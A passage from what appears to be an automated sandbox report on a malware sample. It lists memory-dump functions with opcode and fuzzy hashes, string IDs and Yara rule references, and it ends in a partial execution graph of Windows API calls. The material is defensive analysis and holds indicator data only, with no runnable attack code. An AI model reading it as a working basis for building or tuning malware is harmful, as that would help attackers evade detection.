                                                                                                                                                                                                                                                  • Opcode ID: 7ad8d1528cde725abda0e3a7bf937d978d684ba584c82f1c8cef17bf25cc54cc
                                                                                                                                                                                                                                                  • Instruction ID: 86897efe444716d1d95587ebac681241b5faa12a4785edf9612fbb3800d488e9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ad8d1528cde725abda0e3a7bf937d978d684ba584c82f1c8cef17bf25cc54cc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6021F27D604204DFDF14EF24D984B26BBA5FB84318F28C569E84A8B256C33AD447CA65
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 0289D007 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1796889424.000000000289D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0289D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_289d000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3088c0ec5e7e9046fbc3d1eb5a71f5d8d818eeabbcf8559fea00e8da29ec0afa
                                                                                                                                                                                                                                                  • Instruction ID: 8e25d6c880d1ec2a9411f43e64118186479537ba02650816f2f3e7ef6ea02643
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3088c0ec5e7e9046fbc3d1eb5a71f5d8d818eeabbcf8559fea00e8da29ec0afa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E2181795093C08FDB12DF24D994715BF71EB46214F28C5EAD8498F6A7C33A980ACB62
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BA330 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a515ac110e62ba8c2e37eed35a175ba6d5932838a97642556533eae064ae5d58
                                                                                                                                                                                                                                                  • Instruction ID: 3316754d5b25ccf9f320c1049994089291798f1cc286c75f74615a8cebeff843
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a515ac110e62ba8c2e37eed35a175ba6d5932838a97642556533eae064ae5d58
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA11E274D05218DBDB04CFA9E9487EDBBF6FB89311F14A42AE404B3290DB754949CF64
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BB268 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d87bcf0f5fa79b6911bd4bf0727ebb891a5f1a97ea14014a76663a98480ddd8b
                                                                                                                                                                                                                                                  • Instruction ID: 999878c69d61a71f7754fc909b13c8f39a57a2b8b7253ec6931a8dd921b1729e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d87bcf0f5fa79b6911bd4bf0727ebb891a5f1a97ea14014a76663a98480ddd8b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 122112B68003499FCB10DF99C845BDEBFF4EF48324F14841AE958A7261C379A590DFA5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BB000 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ecab5603b7f718f380ebaf29e4642afa4dcde23ecd0c4fef05a0a64799ddf98d
                                                                                                                                                                                                                                                  • Instruction ID: d344e85cb3326ff5d7fb6eae51c6e0157b480a2f33c205bfe7c158eae66c41ea
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecab5603b7f718f380ebaf29e4642afa4dcde23ecd0c4fef05a0a64799ddf98d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4601DB762093E56FC7036F7CDC644DE3FA6DF86220B0400AAE444CB163D9648855D7B6
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BA848 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9d2f853acfdda288b2a27f8a76cdfd5b8815b70dafd462e2b24be7326b87f691
                                                                                                                                                                                                                                                  • Instruction ID: 07a341392147aad0da859bc5ffd6fd9f7ccd9a2c262643f44c89ee24b88f7eda
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d2f853acfdda288b2a27f8a76cdfd5b8815b70dafd462e2b24be7326b87f691
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 541126B6800249DFDB10CF99C845BDEBFF4FB48320F148419E514A7251C779A954DFA5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 0288D655 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1796673523.000000000288D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0288D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_288d000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d793579671d4d671565d796f8e44c7efdb1f38973bdcd2f417b3af6eeaa4107b
                                                                                                                                                                                                                                                  • Instruction ID: e9e4ed54021b2e3dd2a1cb94752c841c449d00bae3b8fcd22a77bf133271974e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d793579671d4d671565d796f8e44c7efdb1f38973bdcd2f417b3af6eeaa4107b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B801AC7910534899E710EA35CE84767BF98EF41328F18C559ED0D8A2D7C779D840C6F1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 0288D654 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1796673523.000000000288D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0288D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_288d000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5dca1d5ba02956ebd3717f7947d43b1939cdbca96743f84ef0edf1fad1f296f7
                                                                                                                                                                                                                                                  • Instruction ID: 5ab2eb26b1f2c11dc26da591aca655a5bcf4374004473942131559914a10a33e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5dca1d5ba02956ebd3717f7947d43b1939cdbca96743f84ef0edf1fad1f296f7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4EF062755043449AE7109E16DD84B66FFA8EB51634F18C45AED0C4A2D7C3799844CBB1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BB030 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c42e519229437c869030f01521fdee6eb9060329dae0327b190710799095da73
                                                                                                                                                                                                                                                  • Instruction ID: c91590c838df4c6b5a53e0166b6e2a13298345cc1e62b8f157d4a313839582d5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c42e519229437c869030f01521fdee6eb9060329dae0327b190710799095da73
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DF089767002197B8F055E98EC049AF7BABEBC8360B004429F919D3251DE358D1257A5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BA2E8 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 278fd7d18c314dadfed4155af8b4afdc3704612090a99128ef3b6da9efe31a91
                                                                                                                                                                                                                                                  • Instruction ID: 05ec1bf178b8f147b5fb03fa5ae97397a4196f381f0fc74cde06b18f0b1a458e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 278fd7d18c314dadfed4155af8b4afdc3704612090a99128ef3b6da9efe31a91
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48F0273094624DEFCB41EBA8E9015ECBB74EB03215F0052D9D808A3212DB315E16DBA6
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BB317 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 447d76b00330c824097017f771dd46ca97cdd5b6fcab755e12c313ef34894a14
                                                                                                                                                                                                                                                  • Instruction ID: d4d593670e5573eee04b4f06e0ce3737288ed09023bec568405e8272cdd35ba8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 447d76b00330c824097017f771dd46ca97cdd5b6fcab755e12c313ef34894a14
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8E02B7644A3468FC705C645A8455EDBF70DEC1121B0952EFD5A0C7103CA284925EF62
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BA2A3 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e05edd0327d1b053c4fa593561848a3aa7920e15b94815e26aafed1df7a87fba
                                                                                                                                                                                                                                                  • Instruction ID: 22705c5c11bb43bda6fc82b730aee13031c82290f4d23493cd0d3953282a443d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e05edd0327d1b053c4fa593561848a3aa7920e15b94815e26aafed1df7a87fba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3E0DF74942108EFC740EFE8EA04A9CB7B5EB41305F0056A8D80893200EB316F19EB55
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BA2A8 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fbc1f67bd78128e915d5f3de1d63946e2f81278c8e6dc46c6b4336d7d7f6b999
                                                                                                                                                                                                                                                  • Instruction ID: 30b0ede1ce6ece03b43e03e4503dc6fb2ebfc0b294edc1be51b25322f6210c82
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbc1f67bd78128e915d5f3de1d63946e2f81278c8e6dc46c6b4336d7d7f6b999
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5E08674942109EFC740EFF9EA04A9DB7B5FB41304F1055A8D409D3250EB715E54DB55
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 065B4D28 Relevance: 5.3, Strings: 4, Instructions: 311COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4c^q$4c^q$4c^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-3178081935
                                                                                                                                                                                                                                                  • Opcode ID: fa0212bc93d250c89480821b55ce8182051db1205c8dcf0f18b982a4a88eb37f
                                                                                                                                                                                                                                                  • Instruction ID: e4b3476941d6fc370c0f75709ebd30e78a5537f629d15a501afa39dba13644bd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa0212bc93d250c89480821b55ce8182051db1205c8dcf0f18b982a4a88eb37f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08A1D131B001159FDB59DF3DC894AAE7BE7BF89300B148469E405DB269EE34DC46CB92
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065B4A08 Relevance: 5.3, Strings: 4, Instructions: 251COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Hbq$Hbq$Hbq$Hbq
                                                                                                                                                                                                                                                  • API String ID: 0-2881081751
                                                                                                                                                                                                                                                  • Opcode ID: c0833ca86d995ee88095aa59a460137bd7d9d6a6fde97fa4dc98d358bb56f206
                                                                                                                                                                                                                                                  • Instruction ID: d113cd13451a269c6a7b7c4904de79a3bb858c3b30684dd23547f0365d3900b0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0833ca86d995ee88095aa59a460137bd7d9d6a6fde97fa4dc98d358bb56f206
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B891A134F102118FCB699F79C4542BEBBE2BF89300F148579D546EB286DB38D942CB94
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065B3B9A Relevance: 9.2, Strings: 7, Instructions: 472COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (_^q$(_^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-2667574237
                                                                                                                                                                                                                                                  • Opcode ID: 82fb0ab554f65a39b1af9744b2ff7467f76bf083f28c883b1ec1276828ba5368
                                                                                                                                                                                                                                                  • Instruction ID: bf004e7f9c66adcc1d0ba6747b509d74d54ef5c27489e97f10f148f9a7c401bc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82fb0ab554f65a39b1af9744b2ff7467f76bf083f28c883b1ec1276828ba5368
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB225774A402089FDB15EFB8D950B9DBBB2FF88304F1089A9D005AF269DB31AD45DF91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065B3BA8 Relevance: 9.2, Strings: 7, Instructions: 464COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (_^q$(_^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-2667574237
                                                                                                                                                                                                                                                  • Opcode ID: b2886ad1899fb98ad478a4b1a4e9a8bae0d3cebd9486be255039057c0acd3ea5
                                                                                                                                                                                                                                                  • Instruction ID: d93660600e453bacec9f517895794715d4c0b9dcd29f992ad86f174dc868c16c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2886ad1899fb98ad478a4b1a4e9a8bae0d3cebd9486be255039057c0acd3ea5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55224774A402089FDB15EFA8D950B9DBBB2FF88304F1089A9D005AF269DB31AD45DF91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065B33B9 Relevance: 6.5, Strings: 5, Instructions: 278COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (_^q$(_^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-142850551
                                                                                                                                                                                                                                                  • Opcode ID: ead889261d05fdfcfce943f1ae1773186455d70dbdfd4721bc6266e9a6367abb
                                                                                                                                                                                                                                                  • Instruction ID: 41b7c7f6381d96ed32b8104753ab71e74bb7eb52a9092ce896ade0fff3e69d5d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ead889261d05fdfcfce943f1ae1773186455d70dbdfd4721bc6266e9a6367abb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FC16974A402089FDB09EFE8DA40A9DBBB6FF88304F108969D111AF368DB31AD45DF51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065B33C8 Relevance: 6.5, Strings: 5, Instructions: 273COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (_^q$(_^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-142850551
                                                                                                                                                                                                                                                  • Opcode ID: 6f0be18b3eee6e7473f2b95e95fafe3d3e92a7b80faa269ce7fd56ffc5a804ee
                                                                                                                                                                                                                                                  • Instruction ID: 34f2fdae78272b37fe7897863f18719c0a6cea6ae5f1c238f588358f67d2ef21
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f0be18b3eee6e7473f2b95e95fafe3d3e92a7b80faa269ce7fd56ffc5a804ee
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CC15874A402089FDB09EFE8DA40A9DBBB6FF88304F108929D111AF368DB31AD45DF51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:13.8%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:3.1%
                                                                                                                                                                                                                                                  Total number of Nodes:131
                                                                                                                                                                                                                                                  Total number of Limit Nodes:12
                                                                                                                                                                                                                                                  execution_graph 29267 6541060 29268 654107a 29267->29268 29272 65410c0 29268->29272 29280 65410b0 29268->29280 29269 6541096 29275 65410ed 29272->29275 29273 6541586 29273->29269 29274 65414f8 29298 6547e90 29274->29298 29304 6547ea0 29274->29304 29275->29274 29288 6547358 29275->29288 29293 6547348 29275->29293 29281 65410ed 29280->29281 29282 65414f8 29281->29282 29284 6547358 4 API calls 29281->29284 29285 6547348 4 API calls 29281->29285 29286 6547e90 3 API calls 29282->29286 29287 6547ea0 3 API calls 29282->29287 29283 6541586 29283->29269 29284->29281 29285->29281 29286->29283 29287->29283 29289 654737f 29288->29289 29309 65475d0 29289->29309 29316 65475c3 29289->29316 29290 65473c8 29290->29275 29294 654734d 29293->29294 29296 65475d0 3 API calls 29294->29296 29297 65475c3 3 API calls 29294->29297 29295 65473c8 29295->29275 29296->29295 29297->29295 29299 6547e8e 29298->29299 29301 6547e96 29298->29301 29299->29273 29300 6547f6f 29300->29273 29301->29300 29331 6548f70 29301->29331 29337 6548f5f 29301->29337 29306 6547ec7 29304->29306 29305 6547f6f 29305->29273 29306->29305 29307 6548f70 3 API calls 29306->29307 29308 6548f5f 3 API calls 29306->29308 29307->29306 29308->29306 29310 65475ec 29309->29310 29323 6547790 29310->29323 29327 65477a0 29310->29327 29311 65476b6 KiUserExceptionDispatcher 29313 654772f 29311->29313 29313->29290 29317 65475ec 29316->29317 29321 6547790 LdrInitializeThunk 29317->29321 29322 65477a0 LdrInitializeThunk 29317->29322 29318 65476b6 KiUserExceptionDispatcher 29320 654772f 29318->29320 29320->29290 29321->29318 29322->29318 29324 65477c7 29323->29324 29325 65477f7 29324->29325 29326 65477ff LdrInitializeThunk 29324->29326 29325->29311 29326->29325 29328 65477c7 29327->29328 29329 65477ff LdrInitializeThunk 29328->29329 29330 65477f7 29328->29330 29329->29330 29330->29311 29333 6548f97 29331->29333 29332 654901d 29332->29301 29333->29332 29343 654bdb1 29333->29343 29347 654a898 29333->29347 29351 654bcd2 29333->29351 29338 6548f70 29337->29338 29339 654901d 29338->29339 29340 654bdb1 LdrInitializeThunk 29338->29340 29341 654bcd2 LdrInitializeThunk 29338->29341 29342 654a898 LdrInitializeThunk 29338->29342 29339->29301 29340->29339 29341->29339 29342->29339 29344 654bd9b 29343->29344 29346 654aa30 29343->29346 29345 654b24e LdrInitializeThunk 29345->29346 29346->29344 29346->29345 29350 654a89d 29347->29350 29348 654bd9b 29349 654b24e LdrInitializeThunk 29349->29350 29350->29348 29350->29349 29354 654aa30 29351->29354 29352 654bd9b 29353 654b24e LdrInitializeThunk 29353->29354 29354->29352 29354->29353 29246 30e4668 29247 30e4669 29246->29247 29248 30e4696 29247->29248 29250 30e47a0 29247->29250 29251 30e47a4 29250->29251 29255 30e48b0 29251->29255 29259 30e48a1 29251->29259 29257 30e48b1 29255->29257 29256 30e49b4 29256->29256 29257->29256 29263 30e4248 29257->29263 29261 30e48a4 29259->29261 29260 30e49b4 29260->29260 29261->29260 29262 30e4248 CreateActCtxA 29261->29262 29262->29260 29264 30e5940 CreateActCtxA 29263->29264 29266 30e5a03 29264->29266 29355 30ead38 29356 30ead39 29355->29356 29360 30eae20 29356->29360 29368 30eae30 29356->29368 29357 30ead47 29361 30eae24 29360->29361 29362 30eae64 29361->29362 29376 30eb0b8 29361->29376 29380 30eb0c8 29361->29380 29362->29357 29363 30eae5c 29363->29362 29364 30eb068 GetModuleHandleW 29363->29364 29365 30eb095 